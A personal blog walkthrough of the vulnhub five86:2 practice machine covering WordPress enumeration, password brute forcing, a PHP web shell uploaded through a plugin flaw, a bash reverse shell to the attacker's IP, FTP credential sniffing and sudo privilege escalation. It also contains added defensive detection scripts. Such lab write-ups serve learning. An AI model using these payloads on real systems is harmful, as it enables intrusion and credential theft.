kuroto's blog

Just a diary

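vulnhub five86:2 walkthrough

Introduction

I recently started doing vulnhub, so I'm keeping this write-up as a memo. This is the machine I attempted:

www.vulnhub.com

I haven't done five86-1 yet, so I plan to do it another time.

For how to approach vulnhub enumeration, I referred to the following: kakyouim.hatenablog.com

Enumeration

First, find the target's IP address.

sudo netdiscover -r $ip

Change the $ip part each time (e.g. 192.168.100.0/24). Once I had found the address, I added it to /etc/hosts as five86-2.

Next, scan the target.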

$ nmap  -p- -A -sV five86-2
Host is up (0.0017s latency).
Not shown: 65532 filtered ports
PORT   STATE  SERVICE  VERSION
20/tcp closed ftp-data
21/tcp open   ftp      ProFTPD 1.3.5e
80/tcp open   http     Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.1.4
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Five86-2 – Just another WordPress site
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.19 seconds

Accessing the page showed that it was built with WordPress. For a start, I used wpscan to enumerate user names.

$ wpscan --url five86-2 -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.8
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://five86-2/ 
[+] Started: Fri Feb 28 15:48:56 2020

Interesting Finding(s):

[+] http://five86-2/
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://five86-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://five86-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://five86-2/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://five86-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.4 identified (Latest, released on 2019-12-12).
 | Found By: Rss Generator (Passive Detection)
 |  - http://five86-2/index.php/feed/, <generator>https://wordpress.org/?v=5.1.4</generator>
 |  - http://five86-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.4</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://five86-2/wp-content/themes/twentynineteen/
 | Last Updated: 2020-02-25T00:00:00.000Z
 | Readme: http://five86-2/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 1.4
 | Style URL: http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3
 | Style Name: Twenty Nineteen
 | Style URI: https://github.com/WordPress/twentynineteen
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://five86-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] barney
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gillian
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] stephen
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Fri Feb 28 15:48:59 2020
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 13.343 KB
[+] Data Received: 549.372 KB
[+] Memory used: 126.762 MB
[+] Elapsed time: 00:00:02

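I didn't know what to do from here, so for the time being I tried to see whether the passwords could be cracked.

I downloaded a wordlist more or less at random. user.txt is as follows.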

$ cat user.txt        
admin
gillian
peter
barney
stephen
$ wpscan --url five86-2 -P ./wordlist -U ./user.txt --threads 10
~~~ omitted ~~~
[SUCCESS] - barney / spooky1
[SUCCESS] - stephen / apollo1

This took quite a while.

Now that I had the passwords for barney and stephen, log in to WordPress: http://five86-2/wp-login.php

[Image: WordPress login screen]

Looking at Plugins, only one is active.

[Image: the active plugin]

Googling "insert or embed articulate content into wordpress trial exploit" turned up the following site: www.exploit-db.com

For now, run the following to create a ZIP file.

$ echo "<html>hello</html>" > index.html
$ echo "<?php echo system($_GET['cmd']); ?>" > index.php
$ zip poc.zip index.html index.php 

From Pages, edit the sample page. In the editor, select e-learning.

[Image: edit screen]
Selecting e-learning changes the bottom of the page as shown below.
[Image: after selecting e-learning]
From upload, pick "choose your zip file" and upload the poc.zip created earlier.

Press INSERT without changing any settings, and it looks like this:

[Image: screen after pressing INSERT]

Access http://five86-2/wp-content/uploads/articulate_uploads/poc/index.html

[Image: http://five86-2/wp-content/uploads/articulate_uploads/poc/index.html]
hello is displayed, so index.html and index.php appear to have been placed.
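What this step leaves behind on the server, from the defender's side, as an added example that is not part of the original post: a script file inside the uploads tree, which a periodic scan can flag. The helper names and the constructed sample tree are assumptions made for the example.

```shell
#!/bin/sh
# Added example: flag files under an uploads tree that could run as PHP.
# scan_uploads and make_sample_tree are hypothetical helper names.

# Print "<reason> <path>" for each suspicious file below $1.
scan_uploads() {
    find "$1" -type f | sort | while IFS= read -r f; do
        lower=$(printf '%s' "$f" | tr 'A-Z' 'a-z')
        case "$lower" in
            *.php|*.php[0-9]|*.phtml|*.phar|*.pht)
                printf 'php-extension %s\n' "$f" ;;
            *)
                # Other extensions still matter if a handler maps them to PHP.
                if grep -q '<?php' "$f" 2>/dev/null; then
                    printf 'php-content %s\n' "$f"
                fi ;;
        esac
    done
}

# Constructed tree mirroring the upload path seen above; contents are inert.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/articulate_uploads/poc" "$d/2020/02"
    printf '<html>hello</html>\n' > "$d/articulate_uploads/poc/index.html"
    printf '<?php echo "placeholder"; ?>\n' > "$d/articulate_uploads/poc/index.php"
    printf 'GIF89a<?php echo "placeholder"; ?>\n' > "$d/2020/02/logo.gif"
    printf 'plain text\n' > "$d/2020/02/notes.txt"
    printf '%s\n' "$d"
}

# Demo run: reports logo.gif (by content) and index.php (by extension).
tree=$(make_sample_tree)
scan_uploads "$tree"
rm -rf "$tree"
```

A scan like this complements, rather than replaces, a web-server rule that refuses to execute scripts anywhere under wp-content/uploads.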

Set up a reverse shell.

$ ncat -lvp 1234

Request the following URL to open the reverse shell (replace 自IP, "own IP", with your own address as appropriate):

http://five86-2/wp-content/uploads/articulate_uploads/poc/index.php?cmd=%2Fbin%2Fbash -c 'bash -i >%26 %2Fdev%2Ftcp%2F自IP%2F1234 0>%261'

[Image: reverse shell]

I wasn't really sure what to do from here, so I tried whether I could log in with the WordPress accounts.

<-content/uploads/articulate_uploads/poc$ su stephen                       
Password: apollo1

ls
index.html
index.php

stephen worked, but barney did not.

Switch to a tty shell:

python3 -c 'import pty; pty.spawn("/bin/sh")'

Look for clues.

$ id
uid=1002(stephen) gid=1002(stephen) groups=1002(stephen),1009(pcap)
$ find / -perm -u=s -type f 2>/dev/null
/snap/core/8689/bin/mount
/snap/core/8689/bin/ping
/snap/core/8689/bin/ping6
/snap/core/8689/bin/su
/snap/core/8689/bin/umount
/snap/core/8689/usr/bin/chfn
/snap/core/8689/usr/bin/chsh
/snap/core/8689/usr/bin/gpasswd
/snap/core/8689/usr/bin/newgrp
/snap/core/8689/usr/bin/passwd
/snap/core/8689/usr/bin/sudo
/snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8689/usr/lib/openssh/ssh-keysign
/snap/core/8689/usr/lib/snapd/snap-confine
/snap/core/8689/usr/sbin/pppd
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/nc.traditional
/usr/bin/at
/usr/bin/mount
/usr/bin/su
/usr/bin/chfn
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/umount
/usr/bin/sudo
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
$ cd /home
$ ls -la
total 40
drwxr-xr-x 10 root    root    4096 Jan  9 04:49 .
drwxr-xr-x 20 root    root    4096 Jan  8 22:57 ..
drwx------  2 barney  barney  4096 Jan 13 11:19 barney
drwx------  2 george  george  4096 Jan 13 11:19 george
drwx------  2 gillian gillian 4096 Jan 13 11:19 gillian
drwx------  2 john    john    4096 Jan 13 11:19 john
drwx------  3 paul    paul    4096 Jan 13 11:19 paul
drwx------  4 peter   peter   4096 Jan 13 11:19 peter
drwx------  2 richard richard 4096 Jan 13 11:19 richard
drwx------  3 stephen stephen 4096 Feb 28 05:27 stephen

No idea...

Recall the nmap results.

$ nmap  -p- -A -sV five86-2
Host is up (0.0017s latency).
Not shown: 65532 filtered ports
PORT   STATE  SERVICE  VERSION
20/tcp closed ftp-data
21/tcp open   ftp      ProFTPD 1.3.5e
80/tcp open   http     Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.1.4
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Five86-2 – Just another WordPress site
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.19 seconds

FTP is running.

$ ip address
~~~ omitted ~~~
4: br-eca3858d86bf: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:e9:7c:0d:c8 brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-eca3858d86bf
       valid_lft forever preferred_lft forever
    inet6 fe80::42:e9ff:fe7c:dc8/64 scope link 
       valid_lft forever preferred_lft forever
6: veth5661bf0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-eca3858d86bf state UP group default 
    link/ether ae:65:fb:03:f2:93 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::ac65:fbff:fe03:f293/64 scope link 
       valid_lft forever preferred_lft forever

Try tcpdump.

$ timeout 100 tcpdump -w ftp.pcap -i veth5661bf0
tcpdump: listening on veth5661bf0, link-type EN10MB (Ethernet), capture size 262144 bytes
45 packets captured
45 packets received by filter
0 packets dropped by kernel
$ tcpdump -r ftp.pcap
tcpdump -r ftp.pcap
reading from file ftp.pcap, link-type EN10MB (Ethernet)
05:15:06.660136 IP 172.18.0.10.ftp-data > five86-2.35935: Flags [S], seq 3726234348, win 64240, options [mss 1460,sackOK,TS val 2061727388 ecr 0,nop,wscale 7], length 0
05:15:11.779988 ARP, Request who-has five86-2 tell 172.18.0.10, length 28
05:15:11.780055 ARP, Reply five86-2 is-at 02:42:e9:7c:0d:c8 (oui Unknown), length 28
05:16:01.411151 IP five86-2.43146 > 172.18.0.10.ftp: Flags [S], seq 1507466548, win 64240, options [mss 1460,sackOK,TS val 1051112056 ecr 0,nop,wscale 7], length 0
05:16:01.411199 IP 172.18.0.10.ftp > five86-2.43146: Flags [S.], seq 2912316704, ack 1507466549, win 65160, options [mss 1460,sackOK,TS val 2061782139 ecr 1051112056,nop,wscale 7], length 0
05:16:01.411242 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 1, win 502, options [nop,nop,TS val 1051112056 ecr 2061782139], length 0
05:16:01.413663 IP 172.18.0.10.32812 > _gateway.domain: 20351+ PTR? 1.0.18.172.in-addr.arpa. (41)
05:16:01.415003 IP _gateway.domain > 172.18.0.10.32812: 20351 NXDomain* 0/0/0 (41)
05:16:01.416604 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 1:58, ack 1, win 510, options [nop,nop,TS val 2061782145 ecr 1051112056], length 57: FTP: 220 ProFTPD 1.3.5e Server (Debian) [::ffff:172.18.0.10]
05:16:01.416649 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 58, win 502, options [nop,nop,TS val 1051112062 ecr 2061782145], length 0
05:16:01.417335 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 1:12, ack 58, win 502, options [nop,nop,TS val 1051112062 ecr 2061782145], length 11: FTP: USER paul
05:16:01.417347 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 12, win 510, options [nop,nop,TS val 2061782145 ecr 1051112062], length 0
05:16:01.417777 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 58:90, ack 12, win 510, options [nop,nop,TS val 2061782146 ecr 1051112062], length 32: FTP: 331 Password required for paul
05:16:01.417792 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 90, win 502, options [nop,nop,TS val 1051112063 ecr 2061782146], length 0
05:16:01.417864 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 12:33, ack 90, win 502, options [nop,nop,TS val 1051112063 ecr 2061782146], length 21: FTP: PASS esomepasswford
05:16:01.417871 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 33, win 510, options [nop,nop,TS val 2061782146 ecr 1051112063], length 0
05:16:01.429785 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 90:115, ack 33, win 510, options [nop,nop,TS val 2061782158 ecr 1051112063], length 25: FTP: 230 User paul logged in
05:16:01.429807 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 115, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 0
05:16:01.429844 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 33:41, ack 115, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 8: FTP: TYPE I
05:16:01.429856 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 41, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 0
05:16:01.429949 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 115:134, ack 41, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 19: FTP: 200 Type set to I
05:16:01.429955 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 134, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 0
05:16:01.430004 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 41:66, ack 134, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 25: FTP: PORT 172,18,0,1,184,215
05:16:01.430015 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 66, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 0
05:16:01.430123 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 134:163, ack 66, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 29: FTP: 200 PORT command successful
05:16:01.430130 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 163, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 0
05:16:01.430149 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 66:81, ack 163, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 15: FTP: STOR file.txt
05:16:01.430158 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 81, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 0
05:16:01.430364 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061782158 ecr 0,nop,wscale 7], length 0
05:16:02.436063 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061783164 ecr 0,nop,wscale 7], length 0
05:16:04.452086 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061785180 ecr 0,nop,wscale 7], length 0
05:16:06.564573 ARP, Request who-has 172.18.0.10 tell five86-2, length 28
05:16:06.564543 ARP, Request who-has five86-2 tell 172.18.0.10, length 28
05:16:06.565923 ARP, Reply five86-2 is-at 02:42:e9:7c:0d:c8 (oui Unknown), length 28
05:16:06.565945 ARP, Reply 172.18.0.10 is-at 02:42:ac:12:00:0a (oui Unknown), length 28
05:16:08.612344 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061789340 ecr 0,nop,wscale 7], length 0
05:16:12.196872 IP 172.18.0.10.ftp > five86-2.43144: Flags [P.], seq 3033351166:3033351225, ack 69910674, win 510, options [nop,nop,TS val 2061792925 ecr 1050992285], length 59: FTP: 425 Unable to build data connection: Connection timed out
05:16:12.196978 IP five86-2.43144 > 172.18.0.10.ftp: Flags [.], ack 59, win 502, options [nop,nop,TS val 1051122842 ecr 2061792925], length 0
05:16:12.198035 IP five86-2.43144 > 172.18.0.10.ftp: Flags [P.], seq 1:7, ack 59, win 502, options [nop,nop,TS val 1051122843 ecr 2061792925], length 6: FTP: QUIT
05:16:12.198077 IP 172.18.0.10.ftp > five86-2.43144: Flags [.], ack 7, win 510, options [nop,nop,TS val 2061792926 ecr 1051122843], length 0
05:16:12.198633 IP 172.18.0.10.ftp > five86-2.43144: Flags [P.], seq 59:73, ack 7, win 510, options [nop,nop,TS val 2061792927 ecr 1051122843], length 14: FTP: 221 Goodbye.
05:16:12.199019 IP 172.18.0.10.ftp > five86-2.43144: Flags [F.], seq 73, ack 7, win 510, options [nop,nop,TS val 2061792927 ecr 1051122843], length 0
05:16:12.202694 IP five86-2.43144 > 172.18.0.10.ftp: Flags [F.], seq 7, ack 74, win 502, options [nop,nop,TS val 1051122848 ecr 2061792927], length 0
05:16:12.202754 IP 172.18.0.10.ftp > five86-2.43144: Flags [.], ack 8, win 510, options [nop,nop,TS val 2061792931 ecr 1051122848], length 0
05:16:16.803932 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061797532 ecr 0,nop,wscale 7], length 0

It appears to be logging in as paul with esomepasswford, so:

$ su paul
su paul
Password: esomepasswford
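The exposure shown in this capture, as an added example that is not part of the original post: FTP sends USER and PASS in cleartext, so any account allowed to capture on the interface (here via the pcap group) can read them. The function below scans `tcpdump -r` text output for such logins and reports account and outcome without printing the password; the sample lines are constructed and the function names are hypothetical.

```shell
#!/bin/sh
# Added example: report cleartext FTP logins seen in `tcpdump -r` text output.

# Constructed sample in the layout of the capture above (options trimmed).
sample_capture() {
cat <<'EOF'
05:16:01.417335 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], length 11: FTP: USER paul
05:16:01.417777 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], length 32: FTP: 331 Password required for paul
05:16:01.417864 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], length 21: FTP: PASS not-a-real-password
05:16:01.429785 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], length 25: FTP: 230 User paul logged in
05:17:10.000001 IP five86-2.43200 > 172.18.0.10.ftp: Flags [P.], length 12: FTP: USER carol
05:17:10.000301 IP five86-2.43200 > 172.18.0.10.ftp: Flags [P.], length 12: FTP: PASS wrong
05:17:10.000900 IP 172.18.0.10.ftp > five86-2.43200: Flags [P.], length 22: FTP: 530 Login incorrect.
EOF
}

# Reads tcpdump text on stdin; prints one finding per flow that sent PASS.
find_cleartext_ftp_logins() {
    awk '
    {
        ftp = 0
        for (i = 1; i <= NF; i++) if ($i == "FTP:") { ftp = i; break }
        if (!ftp || $2 != "IP") next
        src = $3; dst = $5; sub(/:$/, "", dst)
        verb = $(ftp + 1)
        if (verb == "USER") {
            user[src " " dst] = $(ftp + 2)
        } else if (verb == "PASS") {
            # Record that a password crossed the wire; never store its value.
            flow = src " " dst
            if (!(flow in result)) order[++n] = flow
            result[flow] = "unknown"
        } else if (verb == "230" || verb == "530") {
            # Server reply: the flow key is the reverse direction.
            flow = dst " " src
            if (flow in result) result[flow] = (verb == "230") ? "success" : "failed"
        }
    }
    END {
        for (i = 1; i <= n; i++) {
            split(order[i], ep, " ")
            u = (order[i] in user) ? user[order[i]] : "?"
            printf "cleartext-ftp-login client=%s server=%s user=%s result=%s\n",
                   ep[1], ep[2], u, result[order[i]]
        }
    }'
}

sample_capture | find_cleartext_ftp_logins
```

Moving the transfer to SFTP or FTPS and limiting membership of capture-capable groups removes the exposure.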

It's not written in the write-up, but I ran the usual command below that I always run.

paul@five86-2:~$ sudo -l
Matching Defaults entries for paul on five86-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User paul may run the following commands on five86-2:
    (peter) NOPASSWD: /usr/sbin/service

Looks like I can become peter.

paul@five86-2:/$ sudo -u peter /usr/sbin/service /bin/bash     
/bin/bash: unrecognized service

Maybe not.

paul@five86-2:~$ sudo -u peter /usr/sbin/service ../../bin/bash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

peter@five86-2:/$ 

It worked, but I don't know why the first one fails and the second one works. If anyone knows, please tell me.
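Why the two invocations differ, as an added example that is not part of the original post: it assumes the wrapper joins its argument onto /etc/init.d before testing and executing it, as the Debian/Ubuntu service script does when it falls back to init scripts. Under that model /bin/bash becomes a non-existent path below /etc/init.d, while ../../bin/bash climbs out of it; the function names are hypothetical.

```shell
#!/bin/sh
# Added example: model of a wrapper that runs "$SERVICEDIR/$SERVICE",
# plus the input check that would stop the traversal.
SERVICEDIR="/etc/init.d"

# Lexically normalise an absolute path (no filesystem access, symlinks ignored).
normalize() {
    out=""
    old_ifs=$IFS
    IFS=/
    set -f
    for part in $1; do
        case "$part" in
            ""|.) ;;                    # empty component or "." changes nothing
            ..) out="${out%/*}" ;;      # ".." drops the last component
            *) out="$out/$part" ;;
        esac
    done
    set +f
    IFS=$old_ifs
    printf '%s\n' "${out:-/}"
}

# Path the wrapper would test for executability and then run.
service_target() {
    normalize "$SERVICEDIR/$1"
}

# Hardened check: a service name must be a single path component.
is_safe_service_name() {
    case "$1" in
        ""|.|..|*/*) return 1 ;;
        *) return 0 ;;
    esac
}

# Demo: the two arguments tried above, next to a normal service name.
for name in ssh /bin/bash ../../bin/bash; do
    if is_safe_service_name "$name"; then verdict=allow; else verdict=reject; fi
    printf '%-16s -> %-22s %s\n' "$name" "$(service_target "$name")" "$verdict"
done
```

On the sudoers side, the corresponding fix is to grant specific service names and actions rather than the bare /usr/sbin/service binary.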

peter@five86-2:/home/peter$ sudo -l
Matching Defaults entries for peter on five86-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User peter may run the following commands on five86-2:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/passwd

Looks like I can become root.

peter@five86-2:/home/peter$ sudo -u root /usr/bin/passwd root
New password: root

Retype new password: root

passwd: password updated successfully
peter@five86-2:/home/peter$ su root
Password: root

root@five86-2:/home/peter#

Now that I'm root, cat the flag and finish.

root@five86-2:/home/peter# cd /root
cd /root
root@five86-2:~# ls
ls
snap  thisistheflag.txt
root@five86-2:~# cat thisistheflag.txt

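Thoughts

It was hard. The actual process was messier, but tidied up to some extent it looks like this. With more practice, I might be able to get through machines of this level smoothly.

Maybe this one next: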

www.vulnhub.com